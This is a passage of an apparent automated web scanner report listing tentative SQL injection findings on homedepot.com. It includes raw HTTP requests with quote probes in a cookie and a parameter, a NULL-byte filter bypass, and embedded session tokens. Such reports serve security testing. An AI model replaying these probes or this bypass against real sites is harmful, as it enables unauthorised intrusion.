s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:50:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:50:55 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225055301%3a%3bC25%5fEXP%3d1360065055%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:50:55 GMT;Path=/


1.72. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [s_vi cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The s_vi cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_vi cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]'; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 12:02:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:02:19 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225729084%3a%3bC25%5fEXP%3d1360065729%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:02:09 GMT;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1%3a%3bC6%3d%7b%22I1%22%3a%22217%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24304%2c583%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=svXZasEMxmb88kEomTGn54kPt%2bg%3d%0a%3b2011%2d06%2d16+08%3a02%3a14%2e7%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:05:42 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308229334700%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cojrHbNk1QOpsT3PaxOLUWNFF05E%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]''; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 12:02:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:02:20 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308225740082%3a%3bC25%5fEXP%3d1360065740%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:02:20 GMT;Path=/


1.73. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay [catalogId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The catalogId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catalogId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&catalogId=10053%00'&quantity=1&orderItemId_0=330520025&orderItemId=330520025&langId=-1&catEntryId=202562705&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224029646%3a%3bC25%5fEXP%3d1360064029%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630141%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cwD0O4YDr3%2f35oqr%2b4vJ6YCxfvjU%3d

Response 1 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:49:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:49:32 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:26 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:27 GMT;Path=/
